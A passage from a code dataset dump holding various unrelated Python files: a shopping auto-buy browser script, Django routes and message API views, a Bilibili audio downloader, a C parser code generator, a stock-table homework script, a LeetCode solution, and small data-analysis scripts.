tt=datetime.now()\r\n        tttt=t3-tt\r\n\r\n        ttt= tttt.days*24*60*60+tttt.seconds\r\n        print ('timespan:%d'%ttt)\r\n        if(ttt>60*20 ):\r\n            print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'sleep 15')\r\n            time.sleep(60*15)\r\n            b.reload()\r\n            #print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'sleep 15')\r\n            continue\r\n        else:\r\n            if (ttt>=60*2):\r\n                print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'sleep 1')\r\n                time.sleep(60)\r\n\r\n                continue\r\n            else:\r\n                if(ttt<60*2 and ttt>=7):\r\n                    print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'sleep 1 second')\r\n                    time.sleep(1)\r\n\r\n                    continue\r\n                else:\r\n                    if(ttt<7 and ttt >-60*15):\r\n                        #qg =b.find_by_id('choose-btn-ko')\r\n                        tryb = b.find_by_id('tryBtn')\r\n                        lentry=tryb.__len__()\r\n                        if lentry != 1:\r\n                            print('reload')\r\n                            b.reload()\r\n\r\n                        if lentry ==1:\r\n                            print('try buy ')\r\n                            tryb.click()\r\n\r\n                            b.find_by_id('saveConsigneeTitleDiv').click()\r\n                            b.find_by_id('order-submit').click()\r\n                            continue\r\n                        qg =b.find_by_id('choose-btn-ko')\r\n                        ttttt= qg.__len__()\r\n                        print('ttttt %d'%ttttt)\r\n                        if ttttt==1:\r\n                            qbhtml=qg.first.outer_html\r\n                            enable=qbhtml.find('btn-disable')\r\n                            print('enable %d %s'%(enable, qbhtml))\r\n                            if enable ==-1:\r\n                                print('buy')\r\n                                qg.click()\r\n                                
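# confirm the consignee details and submit the order\r\n                                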
b.find_by_id('saveConsigneeTitleDiv').click()\n b.find_by_id('order-submit').click()\n \n \n \n\n\n ","sub_path":"first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"628336873","text":"\"\"\"qstack URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom registration.backends.simple.views import RegistrationView\nfrom registration.forms import RegistrationFormUniqueEmail\nfrom django.views.generic import TemplateView\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n\n\n # If possible convert all into for [get and post] class based views\n\n #############################################################\n\n # A Feauture for All [CR Views]\n\n url(r'^add/', 'cab.views.add', name='add'),\n\n # Index config\n\n url(r'^$', 'cab.views.index', name='index'),\n\n\n\n # To be Deprecated Slag to be established to For Limited Swags\n\n url(r'^delete/(?P[0-9]+)/$', 'cab.views.delete', name='delete'),\n url(r'^edit/(?P[0-9]+)/$', 'cab.views.edit', name='edit'),\n\n # For all [[[ Most Important View ]]]\n\n url(r'^question/(?P[0-9]+)/$',\n 'cab.views.detail_view', name='detail_view'),\n\n # For a Particular User\n\n url(r'^delete_a/(?P[0-9]+)/$',\n 'cab.views.delete_answer', name='delete_answer'),\n url(r'^edit_a/(?P[0-9]+)/$',\n 'cab.views.edit_answer', name='edit_answer'),\n\n\n\n #####################################################\n\n\n # Seperate view into another app and check functionality\n\n url(\n r'^register/$',\n RegistrationView.as_view(form_class=RegistrationFormUniqueEmail),\n name='registration_register',\n ),\n\n url(r'', include('registration.backends.simple.urls')),\n\n\n ######################################################\n\n # Bookmarking (i.e Favoriting Views)\n url(r'^favs/', 'cab.views.user_bookmarks', name='cab_user_bookmarks'),\n url(r'^add_fav/(?P\\d+)/$',\n 'cab.views.add_bookmark', name='cab_bookmark_add'),\n url(r'^delete_fav/(?P\\d+)/$',\n 'cab.views.delete_bookmark', name='cab_bookmark_delete'),\n\n\n\n # Rating Views\n\n url(r'^(?P\\d+)/rate/$',\n 'cab.views.rate_snippet', name='cab_answer_rate'),\n\n\n # support\n url(r'^support/$', 'cab.views.support', name='support'),\n\n\n url(r'^uquestions/$', 'cab.views.uquestions', name='uquestions'),\n url(r'^uanswers/$', 'cab.views.uanswers', name='uanswers'),\n\n url(r'^d3mapper/$', 'cab.views.d3mapper', name='d3mapper'),\n url(r'^search/$', 'cab.views.search', name='search'),\n\n\n # Accounts\n\n url(r'', include('django.contrib.auth.urls')),\n\n url(r'^markdown/', TemplateView.as_view(template_name=\"markdown.html\"))\n\n\n # Internal Server Error Pages Not Found Pages Set DEBUG = TRUE\n\n\n]\n\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += 
static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"qstack/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"121090737","text":"def load_test_data(data_dir, sz, rescale = 1):\n from PIL import Image\n import os\n import numpy as np\n from tqdm import tqdm\n\n num_images = len(os.listdir(data_dir))\n print(\"{} images found\".format(num_images))\n file_name = []\n x_test = np.empty((num_images, sz,sz,3), dtype=np.float32)\n\n c = 0\n for f in tqdm(os.listdir(data_dir)):\n img = Image.open(os.path.join(data_dir, f))\n img = img.convert(mode = \"RGB\")\n x_test[c,...] = img.resize((sz,sz))\n file_name.append(f)\n c += 1\n\n return x_test * rescale, file_name","sub_path":"load_test_seedling.py","file_name":"load_test_seedling.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"417204353","text":"\"\"\"\n Eric Zorn 1/8/2018 Stock Earnings Summary: ICT 4370 Winter 2018 Module 2\n\n In this project, I was able to build two different tables with prefilled user data. I was able to store all of the information\n into the appropriate variables as lists of information. I then was able to gain user input for the person's name. I then performed\n the logic of earnings or losses and built a new list with those given values by using the Python append() function.\n\n I imported a library known as texttable to build the first formatted table of information and have also built a custom table beneath it.\n I used a proper header with the name value and the format() functions for appending all of these values to a string of text.\n\n Attached to this submission as well is a table that is built completely off of user input. I wanted to give it a try with functions in Python.\n\n\"\"\"\n\n# Import Text Table Module/Library\nimport texttable\n\n# Set\ntable = texttable.Texttable()\n\n# Pre-defined variables of stock information\nname = input(\"What is your full name? 
\")\n\ntitles = [\"Stock Symbol\", \"NO Shares\", \"Purchase Price\", \"Current Value\", \"Earnings/Losses\"]\nstock_symbols = [\"GOOGL\", \"MSFT\", \"RDS-A\", \"AIG\", \"FB\"]\nnumber_shares = [125, 85, 400, 235, 150]\npurchase_prices = [772.88, 56.60, 49.58, 54.21, 124.31]\ncurrent_prices = [941.53, 73.04, 55.74, 65.27, 172.45]\nearns_losses = []\n\nfull_list = []\n\n\n# The formula is (Shares own * current price) - (shares own * bought price)\nearn_loss_one = (number_shares[0] * current_prices[0]) - (number_shares[0] * purchase_prices[0])\nearns_loss_two = (number_shares[1] * current_prices[1]) - (number_shares[1] * purchase_prices[1])\nearns_loss_three = (number_shares[2] * current_prices[2]) - (number_shares[2] * purchase_prices[2])\nearns_loss_four = (number_shares[3] * current_prices[3]) - (number_shares[3] * purchase_prices[3])\nearns_loss_five = (number_shares[4] * current_prices[4]) - (number_shares[4] * purchase_prices[4])\nearns_losses.append(earn_loss_one)\nearns_losses.append(earns_loss_two)\nearns_losses.append(earns_loss_three)\nearns_losses.append(earns_loss_four)\nearns_losses.append(earns_loss_five)\n\n\n# Append and Print Nested List to full_list variable\nfull_list.append(titles)\nfull_list.append(stock_symbols)\nfull_list.append(number_shares)\nfull_list.append(purchase_prices)\nfull_list.append(current_prices)\nfull_list.append(earns_losses)\n\n# print(full_list)\n\n# Check for Floating Point Number Function\ndef isFloat(string):\n try:\n float(string)\n return True\n except ValueError:\n return False\n\n# Check to see if Name Variable is an Integer or a Float. If so, program will exit\nif name.isdigit() or isFloat(name):\n exit()\n\n\n# Create Table as long as all data is True and the correct data type\nprint(\"\\n\\n\\n\")\nprint(\"Stock Table Info for {0} (TextTable Library)\".format(name.upper()))\nprint(\"---------------------------------------\")\nheader = titles\ntable.header(header)\nrow = [stock_symbols[0], number_shares[0], purchase_prices[0], current_prices[0], earns_losses[0]]\ntable.add_row(row)\nrow = [stock_symbols[1], number_shares[1], purchase_prices[1], current_prices[1], earns_losses[1]]\ntable.add_row(row)\nrow = [stock_symbols[2], number_shares[2], purchase_prices[2], current_prices[2], earns_losses[2]]\ntable.add_row(row)\nrow = [stock_symbols[3], number_shares[3], purchase_prices[3], current_prices[3], earns_losses[3]]\ntable.add_row(row)\nrow = [stock_symbols[4], number_shares[4], purchase_prices[4], current_prices[4], earns_losses[4]]\ntable.add_row(row)\n\n\n# Draw the Table\ndraw_table = table.draw()\nprint(draw_table)\n\n\n\n\nprint(\"\\n\\n\\n\")\nprint(\"Stock Table Info for {0} (Custom Table)\".format(name.upper()))\nprint(\"---------------------------------------\")\nprint(\"{0} | {1} | {2} | {3} | {4}\".format(titles[0], titles[1], titles[2], titles[3], titles[4]))\nprint(\"{0} | {1} | {2} | {3} | ${4}\".format(stock_symbols[0], number_shares[0], purchase_prices[0], current_prices[0], earns_losses[0]))\nprint(\"{0} | {1} | {2} | {3} | ${4}\".format(stock_symbols[1], number_shares[1], purchase_prices[1], current_prices[1], earns_losses[1]))\nprint(\"{0} | {1} | {2} | {3} | ${4}\".format(stock_symbols[2], number_shares[2], purchase_prices[2], current_prices[2], earns_losses[2]))\nprint(\"{0} | {1} | {2} | {3} | ${4}\".format(stock_symbols[3], number_shares[3], purchase_prices[3], current_prices[3], earns_losses[3]))\nprint(\"{0} | {1} | {2} | {3} | ${4}\".format(stock_symbols[4], number_shares[4], purchase_prices[4], current_prices[4], 
earns_losses[4]))","sub_path":"Module 2/Homework/preGen.py","file_name":"preGen.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"385925043","text":"import sys\r\n\r\nimport requests\r\nimport urllib.request\r\nimport time\r\n\r\ndef printA(s):\r\n    sys.stdout.write(s + '\\n')\r\n\r\ndef getCidAndTitle(bvid, p=1):\r\n    url = 'https://api.bilibili.com/x/web-interface/view?bvid=' + bvid\r\n    data = requests.get(url).json()['data']\r\n    title = data['title']\r\n    cid = data['pages'][p - 1]['cid']\r\n    return str(cid), title\r\n\r\n\r\ndef getInformation(bvList):\r\n    infoList = []\r\n    for bvid in bvList:\r\n        item = []\r\n        bvid = bvid[-12:]\r\n        if len(bvid) == 12:\r\n            cid, title = getCidAndTitle(bvid)\r\n            item.append(bvid)\r\n        else:\r\n            assert len(bvid) == 12\r\n        item.append(cid)\r\n        item.append(title)\r\n        infoList.append(item)\r\n\r\n    return infoList\r\n\r\n\r\ndef getAudio(item, folder=''):\r\n    bvid, cid, title = item[0], item[1], item[2]\r\n    try:\r\n        baseUrl = 'https://api.bilibili.com/x/player/playurl?fnval=16&'\r\n        st = time.time()\r\n        printA('Start download: ' + title)\r\n        url = baseUrl + 'bvid=' + bvid + '&cid=' + cid\r\n\r\n        audioUrl = requests.get(url).json()['data']['dash']['audio'][0]['baseUrl']\r\n\r\n        opener = urllib.request.build_opener()\r\n        opener.addheaders = [\r\n            ('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0'),\r\n            ('Accept', '*/*'),\r\n            ('Accept-Language', 'en-US,en;q=0.5'),\r\n            ('Accept-Encoding', 'gzip, deflate, br'),\r\n            ('Range', 'bytes=0-'),\r\n            ('Referer', 'https://api.bilibili.com/x/web-interface/view?bvid=' + bvid),  # note: the Referer must be set, it is required!\r\n            ('Origin', 'https://www.bilibili.com'),\r\n            ('Connection', 'keep-alive'),\r\n        ]\r\n        urllib.request.install_opener(opener)\r\n        urllib.request.urlretrieve(url=audioUrl, filename=folder + '/' + title + '.mp3')\r\n        ed = time.time()\r\n        printA(str(round(ed - st, 2)) + ' seconds download finish: ' + title)\r\n        time.sleep(1)\r\n    except Exception as e:\r\n        printA(str(e))\r\n        printA(\"Error: unable to download: \" + title)\r\n\r\n\r\nif __name__ == '__main__':\r\n    folder = ''\r\n    if sys.argv[1] == 'c':\r\n        folder = '中文'\r\n    elif sys.argv[1] == 'j':\r\n        folder = '日文'\r\n    elif sys.argv[1] == 'p':\r\n        folder = '钢琴曲'\r\n    else:\r\n        folder = sys.argv[1]\r\n\r\n    print(\"Download to: \" + folder)\r\n    BVList = sys.argv[2:]\r\n    songs = getInformation(BVList)\r\n    for item in songs:\r\n        try:\r\n            getAudio(item, folder)\r\n        except Exception:\r\n            print(\"Failed to download %s!\" % item[2])\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"16692276","text":"from functools import reduce\n\n\nclass BaseCodeFileWriter:\n    def __init__(self, compiler):\n        self.compiler = compiler\n\n    def write(self, filename):\n        with open(filename, \"w\") as fh:\n            self._write_implementation(fh)\n            self._write_final_token_processed_function(fh)\n\n    def _write_final_token_processed_function(self, fh):\n        fh.write(\"\\n\")\n        fh.writelines([\n            \"void %sfinal_token_processed(%s *parserState) {\\n\" % (self.compiler.interface_prefix, self.compiler.state_variable_type),\n            \"    switch (parserState->state) {\\n\"\n        ])\n\n        leave_states = dict()\n        for state in filter(lambda x: x.reset_state is not None, self.compiler.states):\n            if state.reset_state.name not in leave_states:\n                leave_states[state.reset_state.name] = []\n            
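# group every leaving state under the state it resets back into\n            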
leave_states[state.reset_state.name].append(state)\n\n for leave_state, leaving_states in leave_states.items():\n for state in leaving_states:\n fh.write(\" case %s%s:\\n\" % (self.compiler.const_prefix, state.name))\n fh.write(\" parserState->state = %s%s;\\n\" % (self.compiler.const_prefix, leave_state))\n fh.write(\" break;\\n\")\n\n fh.writelines([\n \" default:\\n\",\n \" parserState->state = %sSTATE__START;\\n\" % self.compiler.const_prefix,\n \" break;\\n\",\n \" }\\n\",\n \"}\\n\"\n ])\n\n\nclass BaseHeaderFileWriter:\n def __init__(self, state_id_getter, compiler):\n self.state_id_getter = state_id_getter\n self.compiler = compiler\n self.longest_name_length = None\n\n def write(self, filename):\n self._find_longest_name_length()\n\n with open(filename, \"w\") as fh:\n fh.writelines([\n \"#include \\n\",\n \"#include \\n\"\n ])\n\n self._write_public_states(fh)\n self._write_flags(fh)\n self._write_typedef(fh)\n self._write_public_interface(fh)\n self._write_is_final_token_function(fh)\n self._write_expect_functions(fh)\n if self.compiler.debug:\n self._write_debug_final_state_function(fh)\n self._write_private_states(fh)\n\n def _find_longest_name_length(self):\n self.longest_name_length = reduce(lambda x, y: max(x, y), map(lambda x: len(x.name), self.compiler.states))\n\n def _write_public_states(self, fh):\n fh.write(\"\\n\")\n fh.write(\"#define %s%*s %d\\n\" % (self.compiler.const_prefix, -self.longest_name_length, \"STATE__FIRST_FINAL\", self.state_id_getter(self.compiler.final_final_state)))\n for state in filter(lambda x: x.is_final or x == self.compiler.start_state, self.compiler.states):\n fh.write(\"#define %s%*s %d\\n\" % (self.compiler.const_prefix, -self.longest_name_length, state.name, self.state_id_getter(state)))\n\n def _write_flags(self, fh):\n fh.write(\"\\n\")\n for flag in self.compiler.all_flags.values():\n fh.write(\"#define %s%*s %d\\n\" % (self.compiler.const_prefix, -self.longest_name_length, flag.identifier(), 1 << flag.index))\n\n def _write_typedef(self, fh):\n fh.write(\"\\n\")\n fh.write(\"typedef struct %s {\\n\" % self.compiler.state_variable_type)\n fh.write(\" %-20s %s;\\n\" % (\"uint16_t\", \"state\"))\n fh.write(\" %-20s %s;\\n\" % (\"uint8_t\", \"flags\"))\n fh.write(\" %-20s %s;\\n\" % (\"uint8_t\", \"len\"))\n for key, spec in self.compiler.variables.items():\n if spec.len is not None:\n fh.write(\" %-20s %s[%d];\\n\" % (spec.type, key, spec.len))\n else:\n fh.write(\" %-20s %s;\\n\" % (spec.type, key))\n fh.write(\"} %s;\\n\" % self.compiler.state_variable_type)\n fh.write(\"\\n\");\n fh.write(\"#define %s_INITIALIZER { %sSTATE__START, 0 };\\n\" % (self.compiler.state_variable_type.upper(), self.compiler.const_prefix))\n\n def _write_public_interface(self, fh):\n fh.write(\"\\n\");\n fh.writelines([\n \"extern bool %sprocess_character(%s *parserState, unsigned char c);\\n\" % (self.compiler.interface_prefix, self.compiler.state_variable_type),\n \"extern void %sfinal_token_processed(%s *parserState);\\n\" % (self.compiler.interface_prefix, self.compiler.state_variable_type),\n ])\n\n def _write_is_final_token_function(self, fh):\n fh.write(\"\\n\");\n fh.writelines([\n \"static inline bool %sis_final_token(uint16_t state) {\\n\" % self.compiler.interface_prefix,\n \" return state >= %sSTATE__FIRST_FINAL;\\n\" % self.compiler.const_prefix,\n \"}\\n\"\n ])\n\n def _write_expect_functions(self, fh):\n for key, expect in self.compiler.expects.items():\n fh.write(\"\\n\");\n fh.writelines([\n \"static inline bool %sexpect_%s(%s *parserState) 
{\\n\" % (self.compiler.interface_prefix, expect.name, self.compiler.state_variable_type),\n \" uint16_t state = parserState->state;\\n\",\n \" if (%s) {\\n\" % \" || \".join(map(lambda x: \"state == %s%s\" % (self.compiler.const_prefix, x), expect.states)),\n \" return true;\\n\",\n \" }\\n\",\n \" if (%sis_final_token(state)) {\\n\" % self.compiler.interface_prefix,\n \" %sfinal_token_processed(parserState);\\n\" % self.compiler.interface_prefix,\n \" }\\n\",\n \" return false;\\n\",\n \"}\\n\"\n ])\n\n def _write_debug_final_state_function(self, fh):\n fh.write(\"\\n\");\n fh.write(\"#include \\n\")\n fh.write(\"\\n\");\n fh.writelines([\n \"static int %sdebug_final_state(%s *parserState, unsigned char *buffer, size_t bufferLen) {\\n\" % ( self.compiler.interface_prefix, self.compiler.state_variable_type),\n \" switch (parserState->state) {\\n\"\n ])\n for state in filter(lambda s: s.is_final, self.compiler.states):\n fh.write(\" case %s%s:\\n\" % (self.compiler.const_prefix, state.name))\n format_string = state.name\n format_args = []\n for var in state.placeholders:\n name = var.get('name', var['variable'])\n format_args.append(\"parserState->%s\" % var['variable'])\n format_string = format_string + \" %s=\" % name\n if var['parse'] == \"string\":\n format_string = format_string + \"'%s'\"\n elif var['parse'] == \"decimal\" or var['parse'] == \"enum\":\n format_string = format_string + \"%d\"\n elif var['parse'] == \"integer\":\n format_string = format_string + \"%i\"\n else:\n format_string = format_string + \"%04x\"\n format_args = \", \".join(format_args)\n if len(format_args) > 0:\n format_args = \", \" + format_args\n fh.write(\" return snprintf(buffer, bufferLen, \\\"%s\\\"%s);\\n\" % (format_string, format_args))\n fh.writelines([\n \" }\\n\",\n \" return -1;\\n\",\n \"}\\n\"\n ])\n\n def _write_private_states(self, fh):\n fh.write(\"\\n\")\n for state in filter(lambda x: not x.is_final and x != self.compiler.start_state, self.compiler.states):\n if state.order % 10 == 0:\n fh.write(\"\\n\")\n fh.write(\"#define %s%*s %d\\n\" % (self.compiler.const_prefix, -self.longest_name_length, state.name, self.state_id_getter(state)))\n","sub_path":"tiny_string_parser/base_writers.py","file_name":"base_writers.py","file_ext":"py","file_size_in_byte":7548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"188186086","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nfrom collections import OrderedDict\nfrom django.http import HttpResponse\nfrom .models import DummyUser, Message\nfrom django.db.models import Q\nfrom datetime import datetime\nimport time\nimport calendar\n\n'''\nPairsの課題を解決する新機能提案プレゼン用API\n\n各々の関数でデータを詰め込んだdictをつくり、\nそれをrender_json_responseに渡してJSONに整形してreturnする。\n\n参考: Python Django入門 (6) JSONを返すAPIの部分\nhttp://qiita.com/kaki_k/items/b76acaeab8a9d935c35c\n'''\n\n# response を JSON で返却\ndef render_json_response(request, data, status=None):\n json_str = json.dumps(data, ensure_ascii=False, indent=2)\n callback = request.GET.get('callback')\n if not callback:\n callback = request.POST.get('callback') # POSTでJSONPの場合\n if callback:\n json_str = \"%s(%s)\" % (callback, json_str)\n response = HttpResponse(json_str, content_type='application/javascript; charset=UTF-8', status=status)\n else:\n response = HttpResponse(json_str, content_type='application/json; charset=UTF-8', status=status)\n return 
response\n\n# Method: GET\n# GET a user's data\ndef user_data(request, user_id):\n    user = DummyUser.objects.filter(id = user_id).first()\n\n    data = OrderedDict([\n        ('user_id', int(user_id)),\n        ('user_name', user.name),\n        ('gender', user.gender),\n        ('age', user.age),\n        ('job', user.job),\n    ])\n\n    return render_json_response(request, data)\n\n# Method: GET\n# Returns the message history\n# Messages are returned in id order (i.e. chronologically)\ndef message_history(request):\n    # Read user_id and partner_id from the request.\n    user_id = request.GET.get(\"user_id\")\n    partner_id = request.GET.get(\"partner_id\")\n\n    user = DummyUser.objects.filter(id = user_id).first()\n    partner = DummyUser.objects.filter(id = partner_id).first()\n\n    if user and partner:\n        # select where user1 partner2 user2 partner1\n        # fetch both user->partner and partner->user messages\n        messages = Message.objects.filter(\n            Q(user_id = user_id, partner_id = partner_id) | Q(user_id = partner_id, partner_id = user_id)\n        ).order_by('id')\n\n        # If no messages exist, messages_for_return stays an empty list;\n        # otherwise it becomes a list filled with the message dicts.\n        if messages:\n            messages_for_return = []\n            for message in messages:\n                tstr = message.created_at.strftime('%Y-%m-%d %H:%M:%S')\n                tdatetime = datetime.strptime(tstr,'%Y-%m-%d %H:%M:%S')\n\n                message_for_return = OrderedDict([\n                    ('id', message.id),\n                    ('user_id', message.user.id),\n                    ('partner_id', message.partner.id),\n                    ('content', message.content),\n                    ('created_at',calendar.timegm(tdatetime.timetuple())), # returned as Unix time\n                ])\n                messages_for_return.append(message_for_return)\n        else:\n            messages_for_return = []\n\n        # data to return\n        data = OrderedDict([\n            ('user_id', user.id),\n            ('partner_id', partner.id),\n            ('messages', messages_for_return),\n        ])\n    else:\n        data = {\"status\":\"error\"}\n\n    return render_json_response(request, data)\n\n# Method: POST\n# Register a message in the database\n@csrf_exempt\ndef message_create(request):\n    if \"content\" in request.POST:\n        # handle the case where the query params are given\n        user_id = request.POST.get(\"user_id\")\n        partner_id = request.POST.get(\"partner_id\")\n        content = request.POST.get(\"content\")\n\n        # create\n        Message.objects.create(\n            user = DummyUser.objects.filter(id = user_id).first(),\n            partner = DummyUser.objects.filter(id = partner_id).first(),\n            content = content,\n            # from_me is always set to 1 (i.e. user is the sender / partner is the receiver)\n            from_me = 1,\n        )\n\n        resultdict = {\"status\":\"success\"}\n\n    else:\n        # handle the case where the query params are missing\n        resultdict = {\"status\":\"error\"}\n\n    return render_json_response(request,resultdict)\n\n# Method: GET\n# Register a message in the database\n# Not ideal, but GET is also supported for the Android client's convenience\n@csrf_exempt\ndef message_create_for_android(request):\n    if \"content\" in request.GET:\n        # handle the case where the query params are given\n        user_id = request.GET.get(\"user_id\")\n        partner_id = request.GET.get(\"partner_id\")\n        content = request.GET.get(\"content\")\n\n        # create\n        Message.objects.create(\n            user = DummyUser.objects.filter(id = user_id).first(),\n            partner = DummyUser.objects.filter(id = partner_id).first(),\n            content = content,\n            # from_me is always set to 1 (i.e. user is the sender / partner is the receiver)\n            from_me = 1,\n        )\n\n        resultdict = {\"status\":\"success\"}\n\n    else:\n        # handle the case where the query params are missing\n        resultdict = {\"status\":\"error\"}\n\n    return render_json_response(request,resultdict)\n\n# Method: GET\n# Called in the same way as message_history. Deletes the whole history.\n# Not ideal, but uses GET so it can easily be triggered from a browser\ndef message_reset(request):\n    # Read user_id and partner_id from the request.\n    user_id = request.GET.get(\"user_id\")\n    partner_id = request.GET.get(\"partner_id\")\n\n    user = DummyUser.objects.filter(id = user_id).first()\n
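    # .first() returns None when the id matches no row, so a missing user or\n    # partner falls through to the error response below instead of raising.\n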
    partner = DummyUser.objects.filter(id = partner_id).first()\n\n    if user and partner:\n        # select where user1 partner2 user2 partner1\n        # fetch both user->partner and partner->user messages\n        messages = Message.objects.filter(\n            Q(user_id = user_id, partner_id = partner_id) | Q(user_id = partner_id, partner_id = user_id)\n        ).order_by('id')\n        messages.delete()\n\n        data = {\"status\":\"success\"}\n    else:\n        data = {\"status\":\"error\"}\n\n    return render_json_response(request, data)\n","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"131443291","text":"class Solution:\n    def closedIsland(self, grid) -> int:\n        m, n = len(grid), len(grid[0])\n        directs = [[-1, 0], [1, 0], [0, -1], [0, 1]]\n\n        def dfs(x, y):\n            grid[x][y] = 1\n            ans = 0 < x < m - 1 and 0 < y < n - 1\n            for dx, dy in directs:\n                i, j = x + dx, y + dy\n                if 0 <= i < m and 0 <= j < n and grid[i][j] == 0:\n                    ans &= dfs(i, j)\n            return ans\n\n        res = 0\n        for i in range(m):\n            for j in range(n):\n                if grid[i][j] == 0 and dfs(i, j):\n                    res += 1\n        return res\n\n\ns = Solution()\nprint(s.closedIsland(\n    [[1, 1, 1, 1, 1, 1, 1, 0],\n     [1, 0, 0, 0, 0, 1, 1, 0],\n     [1, 0, 1, 0, 1, 1, 1, 0],\n     [1, 0, 0, 0, 0, 1, 0, 1],\n     [1, 1, 1, 1, 1, 1, 1, 0]]))\n","sub_path":"leetcode/2021/number-of-closed-islands.py","file_name":"number-of-closed-islands.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"533581062","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Libraries\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nimport matplotlib.pyplot as plt\n\n\n# In[3]:\n\n\n# Loading dataframe\ndf = pd.read_csv('C:/Users/TANVIR HOSSEN BAPPY/OneDrive/Desktop/housedatasets/train.csv')\npd.options.display.max_columns = None\ndf.head()\n\n\n# In[4]:\n\n\ndef encode(X, args):\n    '''Encode columns containing string values with LabelEncoder.'''\n    le = LabelEncoder()\n\n    for arg in args:\n        encoded = le.fit_transform(X[arg])\n        X[arg] = encoded\n    return X\n\n\n# In[5]:\n\n\nX = df.drop(['Id', 'Alley', 'PoolQC', 'Fence', 'MiscFeature'], axis=1).dropna()\ny = X['SalePrice']\nX = X.drop(['SalePrice'], axis=1)\n\n\n# In[6]:\n\n\n# Label encoding & splitting data\nX = encode(X, ['MSZoning', 'Street',\n       'LotShape', 'LandContour', 'Utilities', 'LotConfig', 'LandSlope',\n       'Neighborhood', 'Condition1', 'Condition2', 'BldgType', 'HouseStyle', 'RoofStyle',\n       'RoofMatl', 'Exterior1st', 'Exterior2nd', 'MasVnrType',\n       'ExterQual', 'ExterCond', 'Foundation', 'BsmtQual', 'BsmtCond',\n       'BsmtExposure', 'BsmtFinType1', 'BsmtFinType2', 'Heating', 'HeatingQC',\n       'CentralAir', 'Electrical', 'KitchenQual',\n       'Functional', 'FireplaceQu', 'GarageType',\n       'GarageFinish', 'GarageQual', 'GarageCond',\n       'PavedDrive', 'SaleType',\n       'SaleCondition'])\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n\n\n# In[7]:\n\n\n# Linear Regression\nlin_reg = LinearRegression()\nlin_reg.fit(X_train, y_train)\n\n\n# In[8]:\n\n\n# Printing Score\nlin_reg.score(X_test, y_test)*100\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"AI assignment.py","file_name":"AI 
assignment.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"241892253","text":"import numpy\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport csv\r\n\r\n_MAX__NUMER = 6\r\n\r\n\r\nxLabelDateList = []\r\nyLabelDateList = []\r\n\r\n\r\ndef testFile(expdatefilename='fuck-hzfFORexp.csv'): # expdatefilename为指定的数据文件\r\n if expdatefilename not in os.listdir():\r\n expdatecsv = open(expdatefilename, 'a', newline=\"\")\r\n csv_writer = csv.writer(expdatecsv)\r\n for index in range(0, _MAX__NUMER):\r\n xLabelDate = index*0.5\r\n voltageDate = float(input(\"Input data\"+str(xLabelDate)+':'))\r\n csv_writer.writerow([xLabelDate, voltageDate])\r\n else:\r\n csv_file = open(expdatefilename, 'r')\r\n csv_reader = csv.reader(csv_file)\r\n\r\n drawPic(expdatefilename)\r\n\r\n''' if csv_reader.line_num < _MAX__NUMER:\r\n csv_file_size = csv_reader.line_num\r\n print(csv_file_size)\r\n for index in range(csv_file_size, _MAX__NUMER):\r\n xLabelDate = index*0.5\r\n voltageDate = float(input(\"Input data\"+str(xLabelDate)+':'))\r\n print([xLabelDate, voltageDate])\r\n csv_writer.writerow([xLabelDate, voltageDate])'''\r\n\r\ndef drawPic(expdatefilename='fuck-hzfFORexp.csv'):\r\n plt.figure(figsize=(12, 6))\r\n csv_file = open(expdatefilename, 'r')\r\n csv_reader = csv.reader(csv_file)\r\n for item in csv_reader:\r\n print(item)\r\n try:\r\n xLabelDateList.append(float(item[0]))\r\n yLabelDateList.append(float(item[1]))\r\n except IndexError:\r\n pass\r\n 